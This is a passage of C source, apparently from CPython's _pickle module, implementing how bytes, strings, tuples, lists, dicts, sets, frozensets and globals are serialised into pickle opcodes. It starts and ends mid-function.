if (_Pickler_FlushToFile(self) < 0) {
return -1;
}
/* Stream write the payload into the file without going through the
output buffer. */
if (payload == NULL) {
/* TODO: It would be better to use a memoryview with a linked
original string if this is possible. */
payload = mem = PyBytes_FromStringAndSize(data, data_size);
if (payload == NULL) {
return -1;
}
}
result = PyObject_CallFunctionObjArgs(self->write, payload, NULL);
Py_XDECREF(mem);
if (result == NULL) {
return -1;
}
Py_DECREF(result);
/* Reinitialize the buffer for subsequent calls to _Pickler_Write. */
if (_Pickler_ClearBuffer(self) < 0) {
return -1;
}
}
else {
if (_Pickler_Write(self, data, data_size) < 0) {
return -1;
}
}
/* Re-enable framing for subsequent calls to _Pickler_Write. */
self->framing = framing;
return 0;
}
static int
save_bytes(PicklerObject *self, PyObject *obj)
{
if (self->proto < 3) {
/* Older pickle protocols do not have an opcode for pickling bytes
objects. Therefore, we need to fake the copy protocol (i.e.,
the __reduce__ method) to permit bytes object unpickling.
Here we use a hack to be compatible with Python 2. Since in Python
2 'bytes' is just an alias for 'str' (which has different
parameters than the actual bytes object), we use codecs.encode
to create the appropriate 'str' object when unpickled using
Python 2 *and* the appropriate 'bytes' object when unpickled
using Python 3. Again this is a hack and we don't need to do this
with newer protocols. */
PyObject *reduce_value = NULL;
int status;
if (PyBytes_GET_SIZE(obj) == 0) {
reduce_value = Py_BuildValue("(O())", (PyObject*)&PyBytes_Type);
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyObject *unicode_str =
PyUnicode_DecodeLatin1(PyBytes_AS_STRING(obj),
PyBytes_GET_SIZE(obj),
"strict");
_Py_IDENTIFIER(latin1);
if (unicode_str == NULL)
return -1;
reduce_value = Py_BuildValue("(O(OO))",
st->codecs_encode, unicode_str,
_PyUnicode_FromId(&PyId_latin1));
Py_DECREF(unicode_str);
}
if (reduce_value == NULL)
return -1;
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
else {
Py_ssize_t size;
char header[9];
Py_ssize_t len;
size = PyBytes_GET_SIZE(obj);
if (size < 0)
return -1;
if (size <= 0xff) {
header[0] = SHORT_BINBYTES;
header[1] = (unsigned char)size;
len = 2;
}
else if ((size_t)size <= 0xffffffffUL) {
header[0] = BINBYTES;
header[1] = (unsigned char)(size & 0xff);
header[2] = (unsigned char)((size >> 8) & 0xff);
header[3] = (unsigned char)((size >> 16) & 0xff);
header[4] = (unsigned char)((size >> 24) & 0xff);
len = 5;
}
else if (self->proto >= 4) {
header[0] = BINBYTES8;
_write_size64(header + 1, size);
len = 9;
}
else {
PyErr_SetString(PyExc_OverflowError,
"cannot serialize a bytes object larger than 4 GiB");
return -1; /* string too large */
}
if (_Pickler_write_bytes(self, header, len,
PyBytes_AS_STRING(obj), size, obj) < 0)
{
return -1;
}
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
}
/* A copy of PyUnicode_EncodeRawUnicodeEscape() that also translates
backslash and newline characters to \uXXXX escapes. */
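/* For illustration (informal): U+00E9 is emitted as "\u00e9", a literal
   backslash or newline as "\u005c" / "\u000a", U+1F600 as "\U0001f600",
   and every other character below U+0100 is copied through unchanged. */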
static PyObject *
raw_unicode_escape(PyObject *obj)
{
char *p;
Py_ssize_t i, size;
void *data;
unsigned int kind;
_PyBytesWriter writer;
if (PyUnicode_READY(obj))
return NULL;
_PyBytesWriter_Init(&writer);
size = PyUnicode_GET_LENGTH(obj);
data = PyUnicode_DATA(obj);
kind = PyUnicode_KIND(obj);
p = _PyBytesWriter_Alloc(&writer, size);
if (p == NULL)
goto error;
writer.overallocate = 1;
for (i=0; i < size; i++) {
Py_UCS4 ch = PyUnicode_READ(kind, data, i);
/* Map 32-bit characters to '\Uxxxxxxxx' */
if (ch >= 0x10000) {
/* -1: subtract 1 preallocated byte */
p = _PyBytesWriter_Prepare(&writer, p, 10-1);
if (p == NULL)
goto error;
*p++ = '\\';
*p++ = 'U';
*p++ = Py_hexdigits[(ch >> 28) & 0xf];
*p++ = Py_hexdigits[(ch >> 24) & 0xf];
*p++ = Py_hexdigits[(ch >> 20) & 0xf];
*p++ = Py_hexdigits[(ch >> 16) & 0xf];
*p++ = Py_hexdigits[(ch >> 12) & 0xf];
*p++ = Py_hexdigits[(ch >> 8) & 0xf];
*p++ = Py_hexdigits[(ch >> 4) & 0xf];
*p++ = Py_hexdigits[ch & 15];
}
/* Map 16-bit characters, '\\' and '\n' to '\uxxxx' */
else if (ch >= 256 || ch == '\\' || ch == '\n') {
/* -1: subtract 1 preallocated byte */
p = _PyBytesWriter_Prepare(&writer, p, 6-1);
if (p == NULL)
goto error;
*p++ = '\\';
*p++ = 'u';
*p++ = Py_hexdigits[(ch >> 12) & 0xf];
*p++ = Py_hexdigits[(ch >> 8) & 0xf];
*p++ = Py_hexdigits[(ch >> 4) & 0xf];
*p++ = Py_hexdigits[ch & 15];
}
/* Copy everything else as-is */
else
*p++ = (char) ch;
}
return _PyBytesWriter_Finish(&writer, p);
error:
_PyBytesWriter_Dealloc(&writer);
return NULL;
}
static int
write_unicode_binary(PicklerObject *self, PyObject *obj)
{
char header[9];
Py_ssize_t len;
PyObject *encoded = NULL;
Py_ssize_t size;
const char *data;
if (PyUnicode_READY(obj))
return -1;
data = PyUnicode_AsUTF8AndSize(obj, &size);
if (data == NULL) {
/* Issue #8383: for strings with lone surrogates, fall back on the
"surrogatepass" error handler. */
PyErr_Clear();
encoded = PyUnicode_AsEncodedString(obj, "utf-8", "surrogatepass");
if (encoded == NULL)
return -1;
data = PyBytes_AS_STRING(encoded);
size = PyBytes_GET_SIZE(encoded);
}
assert(size >= 0);
if (size <= 0xff && self->proto >= 4) {
header[0] = SHORT_BINUNICODE;
header[1] = (unsigned char)(size & 0xff);
len = 2;
}
else if ((size_t)size <= 0xffffffffUL) {
header[0] = BINUNICODE;
header[1] = (unsigned char)(size & 0xff);
header[2] = (unsigned char)((size >> 8) & 0xff);
header[3] = (unsigned char)((size >> 16) & 0xff);
header[4] = (unsigned char)((size >> 24) & 0xff);
len = 5;
}
else if (self->proto >= 4) {
header[0] = BINUNICODE8;
_write_size64(header + 1, size);
len = 9;
}
else {
PyErr_SetString(PyExc_OverflowError,
"cannot serialize a string larger than 4GiB");
Py_XDECREF(encoded);
return -1;
}
if (_Pickler_write_bytes(self, header, len, data, size, encoded) < 0) {
Py_XDECREF(encoded);
return -1;
}
Py_XDECREF(encoded);
return 0;
}
static int
save_unicode(PicklerObject *self, PyObject *obj)
{
if (self->bin) {
if (write_unicode_binary(self, obj) < 0)
return -1;
}
else {
PyObject *encoded;
Py_ssize_t size;
const char unicode_op = UNICODE;
encoded = raw_unicode_escape(obj);
if (encoded == NULL)
return -1;
if (_Pickler_Write(self, &unicode_op, 1) < 0) {
Py_DECREF(encoded);
return -1;
}
size = PyBytes_GET_SIZE(encoded);
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded), size) < 0) {
Py_DECREF(encoded);
return -1;
}
Py_DECREF(encoded);
if (_Pickler_Write(self, "\n", 1) < 0)
return -1;
}
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
/* A helper for save_tuple. Push the len elements in tuple t on the stack. */
static int
store_tuple_elements(PicklerObject *self, PyObject *t, Py_ssize_t len)
{
Py_ssize_t i;
assert(PyTuple_Size(t) == len);
for (i = 0; i < len; i++) {
PyObject *element = PyTuple_GET_ITEM(t, i);
if (element == NULL)
return -1;
if (save(self, element, 0) < 0)
return -1;
}
return 0;
}
/* Tuples are ubiquitous in the pickle protocols, so many techniques are
* used across protocols to minimize the space needed to pickle them.
* Tuples are also the only builtin immutable type that can be recursive
* (a tuple can be reached from itself), and that requires some subtle
* magic so that it works in all cases. IOW, this is a long routine.
*/
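/* Informal sketch of the streams produced (assuming protocol 2, not
 * normative): (1, 2) becomes BININT1 1, BININT1 2, TUPLE2, while a
 * 5-element tuple becomes MARK e1 ... e5 TUPLE. If the tuple turns out to
 * be recursive, the elements already pushed are POPped (or POP_MARKed in
 * binary mode) and the memoized copy is fetched with a GET instead. */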
static int
save_tuple(PicklerObject *self, PyObject *obj)
{
Py_ssize_t len, i;
const char mark_op = MARK;
const char tuple_op = TUPLE;
const char pop_op = POP;
const char pop_mark_op = POP_MARK;
const char len2opcode[] = {EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3};
if ((len = PyTuple_Size(obj)) < 0)
return -1;
if (len == 0) {
char pdata[2];
if (self->proto) {
pdata[0] = EMPTY_TUPLE;
len = 1;
}
else {
pdata[0] = MARK;
pdata[1] = TUPLE;
len = 2;
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
/* The tuple isn't in the memo now. If it shows up there after
* saving the tuple elements, the tuple must be recursive, in
* which case we'll pop everything we put on the stack, and fetch
* its value from the memo.
*/
if (len <= 3 && self->proto >= 2) {
/* Use TUPLE{1,2,3} opcodes. */
if (store_tuple_elements(self, obj, len) < 0)
return -1;
if (PyMemoTable_Get(self->memo, obj)) {
/* pop the len elements */
for (i = 0; i < len; i++)
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
/* fetch from memo */
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else { /* Not recursive. */
if (_Pickler_Write(self, len2opcode + len, 1) < 0)
return -1;
}
goto memoize;
}
/* proto < 2 and len > 0, or proto >= 2 and len > 3.
* Generate MARK e1 e2 ... TUPLE
*/
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
if (store_tuple_elements(self, obj, len) < 0)
return -1;
if (PyMemoTable_Get(self->memo, obj)) {
/* pop the stack stuff we pushed */
if (self->bin) {
if (_Pickler_Write(self, &pop_mark_op, 1) < 0)
return -1;
}
else {
/* Note that we pop one more than len, to remove
* the MARK too.
*/
for (i = 0; i <= len; i++)
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
}
/* fetch from memo */
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else { /* Not recursive. */
if (_Pickler_Write(self, &tuple_op, 1) < 0)
return -1;
}
memoize:
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
/* iter is an iterator giving items, and we batch up chunks of
* MARK item item ... item APPENDS
* opcode sequences. Calling code should have arranged to first create an
* empty list, or list-like object, for the APPENDS to operate on.
* Returns 0 on success, <0 on error.
*/
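/* Informal example (not normative): with protocol 2, the body of the list
 * [4, 5, 6] is emitted as MARK BININT1 4 BININT1 5 BININT1 6 APPENDS,
 * repeated every BATCHSIZE items; the enclosing EMPTY_LIST opcode and the
 * memo PUT come from save_list() below. */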
static int
batch_list(PicklerObject *self, PyObject *iter)
{
PyObject *obj = NULL;
PyObject *firstitem = NULL;
int i, n;
const char mark_op = MARK;
const char append_op = APPEND;
const char appends_op = APPENDS;
assert(iter != NULL);
/* XXX: I think this function could be made faster by avoiding the
iterator interface and fetching objects directly from the list using
PyList_GET_ITEM.
*/
if (self->proto == 0) {
/* APPENDS isn't available; do one at a time. */
for (;;) {
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
return -1;
break;
}
i = save(self, obj, 0);
Py_DECREF(obj);
if (i < 0)
return -1;
if (_Pickler_Write(self, &append_op, 1) < 0)
return -1;
}
return 0;
}
/* proto > 0: write in batches of BATCHSIZE. */
do {
/* Get first item */
firstitem = PyIter_Next(iter);
if (firstitem == NULL) {
if (PyErr_Occurred())
goto error;
/* nothing more to add */
break;
}
/* Try to get a second item */
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
/* Only one item to write */
if (save(self, firstitem, 0) < 0)
goto error;
if (_Pickler_Write(self, &append_op, 1) < 0)
goto error;
Py_CLEAR(firstitem);
break;
}
/* More than one item to write */
/* Pump out MARK, items, APPENDS. */
if (_Pickler_Write(self, &mark_op, 1) < 0)
goto error;
if (save(self, firstitem, 0) < 0)
goto error;
Py_CLEAR(firstitem);
n = 1;
/* Fetch and save up to BATCHSIZE items */
while (obj) {
if (save(self, obj, 0) < 0)
goto error;
Py_CLEAR(obj);
n += 1;
if (n == BATCHSIZE)
break;
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
break;
}
}
if (_Pickler_Write(self, &appends_op, 1) < 0)
goto error;
} while (n == BATCHSIZE);
return 0;
error:
Py_XDECREF(firstitem);
Py_XDECREF(obj);
return -1;
}
/* This is a variant of batch_list() above, specialized for lists (with no
* support for list subclasses). Like batch_list(), we batch up chunks of
* MARK item item ... item APPENDS
* opcode sequences. Calling code should have arranged to first create an
* empty list, or list-like object, for the APPENDS to operate on.
* Returns 0 on success, -1 on error.
*
* This version is considerably faster than batch_list(), if less general.
*
* Note that this only works for protocols > 0.
*/
static int
batch_list_exact(PicklerObject *self, PyObject *obj)
{
PyObject *item = NULL;
Py_ssize_t this_batch, total;
const char append_op = APPEND;
const char appends_op = APPENDS;
const char mark_op = MARK;
assert(obj != NULL);
assert(self->proto > 0);
assert(PyList_CheckExact(obj));
if (PyList_GET_SIZE(obj) == 1) {
item = PyList_GET_ITEM(obj, 0);
if (save(self, item, 0) < 0)
return -1;
if (_Pickler_Write(self, &append_op, 1) < 0)
return -1;
return 0;
}
/* Write in batches of BATCHSIZE. */
total = 0;
do {
this_batch = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (total < PyList_GET_SIZE(obj)) {
item = PyList_GET_ITEM(obj, total);
if (save(self, item, 0) < 0)
return -1;
total++;
if (++this_batch == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &appends_op, 1) < 0)
return -1;
} while (total < PyList_GET_SIZE(obj));
return 0;
}
static int
save_list(PicklerObject *self, PyObject *obj)
{
char header[3];
Py_ssize_t len;
int status = 0;
if (self->fast && !fast_save_enter(self, obj))
goto error;
/* Create an empty list. */
if (self->bin) {
header[0] = EMPTY_LIST;
len = 1;
}
else {
header[0] = MARK;
header[1] = LIST;
len = 2;
}
if (_Pickler_Write(self, header, len) < 0)
goto error;
/* Get list length, and bow out early if empty. */
if ((len = PyList_Size(obj)) < 0)
goto error;
if (memo_put(self, obj) < 0)
goto error;
if (len != 0) {
/* Materialize the list elements. */
if (PyList_CheckExact(obj) && self->proto > 0) {
if (Py_EnterRecursiveCall(" while pickling an object"))
goto error;
status = batch_list_exact(self, obj);
Py_LeaveRecursiveCall();
} else {
PyObject *iter = PyObject_GetIter(obj);
if (iter == NULL)
goto error;
if (Py_EnterRecursiveCall(" while pickling an object")) {
Py_DECREF(iter);
goto error;
}
status = batch_list(self, iter);
Py_LeaveRecursiveCall();
Py_DECREF(iter);
}
}
if (0) {
error:
status = -1;
}
if (self->fast && !fast_save_leave(self, obj))
status = -1;
return status;
}
/* iter is an iterator giving (key, value) pairs, and we batch up chunks of
* MARK key value ... key value SETITEMS
* opcode sequences. Calling code should have arranged to first create an
* empty dict, or dict-like object, for the SETITEMS to operate on.
* Returns 0 on success, <0 on error.
*
* This is very much like batch_list(). The difference between saving
* elements directly, and picking apart two-tuples, is so long-winded at
* the C level, though, that attempts to combine these routines were too
* ugly to bear.
*/
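/* Informal example (not normative): with protocol 2, the items of
 * {'a': 1} are emitted as key value SETITEM (the one-item case), while a
 * larger dict is emitted as MARK key value ... key value SETITEMS in
 * chunks of BATCHSIZE pairs; the enclosing EMPTY_DICT opcode and the memo
 * PUT come from save_dict() below. */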
static int
batch_dict(PicklerObject *self, PyObject *iter)
{
PyObject *obj = NULL;
PyObject *firstitem = NULL;
int i, n;
const char mark_op = MARK;
const char setitem_op = SETITEM;
const char setitems_op = SETITEMS;
assert(iter != NULL);
if (self->proto == 0) {
/* SETITEMS isn't available; do one at a time. */
for (;;) {
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
return -1;
break;
}
if (!PyTuple_Check(obj) || PyTuple_Size(obj) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
return -1;
}
i = save(self, PyTuple_GET_ITEM(obj, 0), 0);
if (i >= 0)
i = save(self, PyTuple_GET_ITEM(obj, 1), 0);
Py_DECREF(obj);
if (i < 0)
return -1;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
return -1;
}
return 0;
}
/* proto > 0: write in batches of BATCHSIZE. */
do {
/* Get first item */
firstitem = PyIter_Next(iter);
if (firstitem == NULL) {
if (PyErr_Occurred())
goto error;
/* nothing more to add */
break;
}
if (!PyTuple_Check(firstitem) || PyTuple_Size(firstitem) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
goto error;
}
/* Try to get a second item */
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
/* Only one item to write */
if (save(self, PyTuple_GET_ITEM(firstitem, 0), 0) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 1), 0) < 0)
goto error;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
goto error;
Py_CLEAR(firstitem);
break;
}
/* More than one item to write */
/* Pump out MARK, items, SETITEMS. */
if (_Pickler_Write(self, &mark_op, 1) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 0), 0) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 1), 0) < 0)
goto error;
Py_CLEAR(firstitem);
n = 1;
/* Fetch and save up to BATCHSIZE items */
while (obj) {
if (!PyTuple_Check(obj) || PyTuple_Size(obj) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
goto error;
}
if (save(self, PyTuple_GET_ITEM(obj, 0), 0) < 0 ||
save(self, PyTuple_GET_ITEM(obj, 1), 0) < 0)
goto error;
Py_CLEAR(obj);
n += 1;
if (n == BATCHSIZE)
break;
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
break;
}
}
if (_Pickler_Write(self, &setitems_op, 1) < 0)
goto error;
} while (n == BATCHSIZE);
return 0;
error:
Py_XDECREF(firstitem);
Py_XDECREF(obj);
return -1;
}
/* This is a variant of batch_dict() above that specializes for dicts, with no
* support for dict subclasses. Like batch_dict(), we batch up chunks of
* MARK key value ... key value SETITEMS
* opcode sequences. Calling code should have arranged to first create an
* empty dict, or dict-like object, for the SETITEMS to operate on.
* Returns 0 on success, -1 on error.
*
* Note that this currently doesn't work for protocol 0.
*/
static int
batch_dict_exact(PicklerObject *self, PyObject *obj)
{
PyObject *key = NULL, *value = NULL;
int i;
Py_ssize_t dict_size, ppos = 0;
const char mark_op = MARK;
const char setitem_op = SETITEM;
const char setitems_op = SETITEMS;
assert(obj != NULL && PyDict_CheckExact(obj));
assert(self->proto > 0);
dict_size = PyDict_GET_SIZE(obj);
/* Special-case len(d) == 1 to save space. */
if (dict_size == 1) {
PyDict_Next(obj, &ppos, &key, &value);
if (save(self, key, 0) < 0)
return -1;
if (save(self, value, 0) < 0)
return -1;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
return -1;
return 0;
}
/* Write in batches of BATCHSIZE. */
do {
i = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (PyDict_Next(obj, &ppos, &key, &value)) {
if (save(self, key, 0) < 0)
return -1;
if (save(self, value, 0) < 0)
return -1;
if (++i == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &setitems_op, 1) < 0)
return -1;
if (PyDict_GET_SIZE(obj) != dict_size) {
PyErr_Format(
PyExc_RuntimeError,
"dictionary changed size during iteration");
return -1;
}
} while (i == BATCHSIZE);
return 0;
}
static int
save_dict(PicklerObject *self, PyObject *obj)
{
PyObject *items, *iter;
char header[3];
Py_ssize_t len;
int status = 0;
assert(PyDict_Check(obj));
if (self->fast && !fast_save_enter(self, obj))
goto error;
/* Create an empty dict. */
if (self->bin) {
header[0] = EMPTY_DICT;
len = 1;
}
else {
header[0] = MARK;
header[1] = DICT;
len = 2;
}
if (_Pickler_Write(self, header, len) < 0)
goto error;
if (memo_put(self, obj) < 0)
goto error;
if (PyDict_GET_SIZE(obj)) {
/* Save the dict items. */
if (PyDict_CheckExact(obj) && self->proto > 0) {
/* We can take certain shortcuts if we know this is a dict and
not a dict subclass. */
if (Py_EnterRecursiveCall(" while pickling an object"))
goto error;
status = batch_dict_exact(self, obj);
Py_LeaveRecursiveCall();
} else {
_Py_IDENTIFIER(items);
items = _PyObject_CallMethodId(obj, &PyId_items, NULL);
if (items == NULL)
goto error;
iter = PyObject_GetIter(items);
Py_DECREF(items);
if (iter == NULL)
goto error;
if (Py_EnterRecursiveCall(" while pickling an object")) {
Py_DECREF(iter);
goto error;
}
status = batch_dict(self, iter);
Py_LeaveRecursiveCall();
Py_DECREF(iter);
}
}
if (0) {
error:
status = -1;
}
if (self->fast && !fast_save_leave(self, obj))
status = -1;
return status;
}
static int
save_set(PicklerObject *self, PyObject *obj)
{
PyObject *item;
int i;
Py_ssize_t set_size, ppos = 0;
Py_hash_t hash;
const char empty_set_op = EMPTY_SET;
const char mark_op = MARK;
const char additems_op = ADDITEMS;
if (self->proto < 4) {
PyObject *items;
PyObject *reduce_value;
int status;
items = PySequence_List(obj);
if (items == NULL) {
return -1;
}
reduce_value = Py_BuildValue("(O(O))", (PyObject*)&PySet_Type, items);
Py_DECREF(items);
if (reduce_value == NULL) {
return -1;
}
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
if (_Pickler_Write(self, &empty_set_op, 1) < 0)
return -1;
if (memo_put(self, obj) < 0)
return -1;
set_size = PySet_GET_SIZE(obj);
if (set_size == 0)
return 0; /* nothing to do */
/* Write in batches of BATCHSIZE. */
do {
i = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (_PySet_NextEntry(obj, &ppos, &item, &hash)) {
if (save(self, item, 0) < 0)
return -1;
if (++i == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &additems_op, 1) < 0)
return -1;
if (PySet_GET_SIZE(obj) != set_size) {
PyErr_Format(
PyExc_RuntimeError,
"set changed size during iteration");
return -1;
}
} while (i == BATCHSIZE);
return 0;
}
static int
save_frozenset(PicklerObject *self, PyObject *obj)
{
PyObject *iter;
const char mark_op = MARK;
const char frozenset_op = FROZENSET;
if (self->fast && !fast_save_enter(self, obj))
return -1;
if (self->proto < 4) {
PyObject *items;
PyObject *reduce_value;
int status;
items = PySequence_List(obj);
if (items == NULL) {
return -1;
}
reduce_value = Py_BuildValue("(O(O))", (PyObject*)&PyFrozenSet_Type,
items);
Py_DECREF(items);
if (reduce_value == NULL) {
return -1;
}
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
iter = PyObject_GetIter(obj);
if (iter == NULL) {
return -1;
}
for (;;) {
PyObject *item;
item = PyIter_Next(iter);
if (item == NULL) {
if (PyErr_Occurred()) {
Py_DECREF(iter);
return -1;
}
break;
}
if (save(self, item, 0) < 0) {
Py_DECREF(item);
Py_DECREF(iter);
return -1;
}
Py_DECREF(item);
}
Py_DECREF(iter);
/* If the object is already in the memo, this means it is
recursive. In this case, throw away everything we put on the
stack, and fetch the object back from the memo. */
if (PyMemoTable_Get(self->memo, obj)) {
const char pop_mark_op = POP_MARK;
if (_Pickler_Write(self, &pop_mark_op, 1) < 0)
return -1;
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
if (_Pickler_Write(self, &frozenset_op, 1) < 0)
return -1;
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
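/* Translate a Python 3 (module_name, global_name) pair back to its Python 2
   spelling using the reverse mappings from _compat_pickle, replacing the
   caller's references in place. Used by save_global() when fix_imports is
   true and the protocol is < 3. Returns 0 on success, -1 on error. */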
static int
fix_imports(PyObject **module_name, PyObject **global_name)
{
PyObject *key;
PyObject *item;
PickleState *st = _Pickle_GetGlobalState();
key = PyTuple_Pack(2, *module_name, *global_name);
if (key == NULL)
return -1;
item = PyDict_GetItemWithError(st->name_mapping_3to2, key);
Py_DECREF(key);
if (item) {
PyObject *fixed_module_name;
PyObject *fixed_global_name;
if (!PyTuple_Check(item) || PyTuple_GET_SIZE(item) != 2) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING values "
"should be 2-tuples, not %.200s",
Py_TYPE(item)->tp_name);
return -1;
}
fixed_module_name = PyTuple_GET_ITEM(item, 0);
fixed_global_name = PyTuple_GET_ITEM(item, 1);
if (!PyUnicode_Check(fixed_module_name) ||
!PyUnicode_Check(fixed_global_name)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING values "
"should be pairs of str, not (%.200s, %.200s)",
Py_TYPE(fixed_module_name)->tp_name,
Py_TYPE(fixed_global_name)->tp_name);
return -1;
}
Py_CLEAR(*module_name);
Py_CLEAR(*global_name);
Py_INCREF(fixed_module_name);
Py_INCREF(fixed_global_name);
*module_name = fixed_module_name;
*global_name = fixed_global_name;
return 0;
}
else if (PyErr_Occurred()) {
return -1;
}
item = PyDict_GetItemWithError(st->import_mapping_3to2, *module_name);
if (item) {
if (!PyUnicode_Check(item)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_IMPORT_MAPPING values "
"should be strings, not %.200s",
Py_TYPE(item)->tp_name);
return -1;
}
Py_INCREF(item);
Py_XSETREF(*module_name, item);
}
else if (PyErr_Occurred()) {
return -1;
}
return 0;
}
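/* Pickle obj (typically a class or a module-level function) by reference.
   If (module_name, global_name) is registered in the extension registry and
   the protocol is >= 2, an EXT1/EXT2/EXT4 opcode is emitted; otherwise
   protocol >= 4 uses STACK_GLOBAL, nested attributes on older protocols go
   through a getattr-based reduce, and the remaining cases use the textual
   GLOBAL opcode. A non-NULL `name` overrides the __qualname__ / __name__
   lookup. */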
static int
save_global(PicklerObject *self, PyObject *obj, PyObject *name)
{
PyObject *global_name = NULL;
PyObject *module_name = NULL;
PyObject *module = NULL;
PyObject *parent = NULL;
PyObject *dotted_path = NULL;
PyObject *lastname = NULL;
PyObject *cls;
PickleState *st = _Pickle_GetGlobalState();
int status = 0;
_Py_IDENTIFIER(__name__);
_Py_IDENTIFIER(__qualname__);
const char global_op = GLOBAL;
if (name) {
Py_INCREF(name);
global_name = name;
}
else {
if (_PyObject_LookupAttrId(obj, &PyId___qualname__, &global_name) < 0)
goto error;
if (global_name == NULL) {
global_name = _PyObject_GetAttrId(obj, &PyId___name__);
if (global_name == NULL)
goto error;
}
}
dotted_path = get_dotted_path(module, global_name);
if (dotted_path == NULL)
goto error;
module_name = whichmodule(obj, dotted_path);
if (module_name == NULL)
goto error;
/* XXX: Change to use the import C API directly with level=0 to disallow
relative imports.
XXX: PyImport_ImportModuleLevel could be used. However, this bypasses
builtins.__import__. Therefore, _pickle, unlike pickle.py, will ignore
custom import functions (IMHO, this would be a nice security
feature). The import C API would need to be extended to support the
extra parameters of __import__ to fix that. */
module = PyImport_Import(module_name);
if (module == NULL) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: import of module %R failed",
obj, module_name);
goto error;
}
lastname = PyList_GET_ITEM(dotted_path, PyList_GET_SIZE(dotted_path)-1);
Py_INCREF(lastname);
cls = get_deep_attribute(module, dotted_path, &parent);
Py_CLEAR(dotted_path);
if (cls == NULL) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: attribute lookup %S on %S failed",
obj, global_name, module_name);
goto error;
}
if (cls != obj) {
Py_DECREF(cls);
PyErr_Format(st->PicklingError,
"Can't pickle %R: it's not the same object as %S.%S",
obj, module_name, global_name);
goto error;
}
Py_DECREF(cls);
if (self->proto >= 2) {
/* See whether this is in the extension registry, and if
* so generate an EXT opcode.
*/
PyObject *extension_key;
PyObject *code_obj; /* extension code as Python object */
long code; /* extension code as C value */
char pdata[5];
Py_ssize_t n;
extension_key = PyTuple_Pack(2, module_name, global_name);
if (extension_key == NULL) {
goto error;
}
code_obj = PyDict_GetItemWithError(st->extension_registry,
extension_key);
Py_DECREF(extension_key);
/* The object is not registered in the extension registry.
This is the most likely code path. */
if (code_obj == NULL) {
if (PyErr_Occurred()) {
goto error;
}
goto gen_global;
}
/* XXX: pickle.py checks neither the type nor the range
of the value returned by the extension_registry. It should, for
consistency. */
/* Verify code_obj has the right type and value. */
if (!PyLong_Check(code_obj)) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: extension code %R isn't an integer",
obj, code_obj);
goto error;
}
code = PyLong_AS_LONG(code_obj);
if (code <= 0 || code > 0x7fffffffL) {
if (!PyErr_Occurred())
PyErr_Format(st->PicklingError, "Can't pickle %R: extension "
"code %ld is out of range", obj, code);
goto error;
}
/* Generate an EXT opcode. */
if (code <= 0xff) {
pdata[0] = EXT1;
pdata[1] = (unsigned char)code;
n = 2;
}
else if (code <= 0xffff) {
pdata[0] = EXT2;
pdata[1] = (unsigned char)(code & 0xff);
pdata[2] = (unsigned char)((code >> 8) & 0xff);
n = 3;
}
else {
pdata[0] = EXT4;
pdata[1] = (unsigned char)(code & 0xff);
pdata[2] = (unsigned char)((code >> 8) & 0xff);
pdata[3] = (unsigned char)((code >> 16) & 0xff);
pdata[4] = (unsigned char)((code >> 24) & 0xff);
n = 5;
}
if (_Pickler_Write(self, pdata, n) < 0)
goto error;
}
else {
gen_global:
if (parent == module) {
Py_INCREF(lastname);
Py_DECREF(global_name);
global_name = lastname;
}
if (self->proto >= 4) {
const char stack_global_op = STACK_GLOBAL;
if (save(self, module_name, 0) < 0)
goto error;
if (save(self, global_name, 0) < 0)
goto error;
if (_Pickler_Write(self, &stack_global_op, 1) < 0)
goto error;
}
else if (parent != module) {
PickleState *st = _Pickle_GetGlobalState();
PyObject *reduce_value = Py_BuildValue("(O(OO))",
st->getattr, parent, lastname);
if (reduce_value == NULL)
goto error;
status = save_reduce(self, reduce_value, NULL);
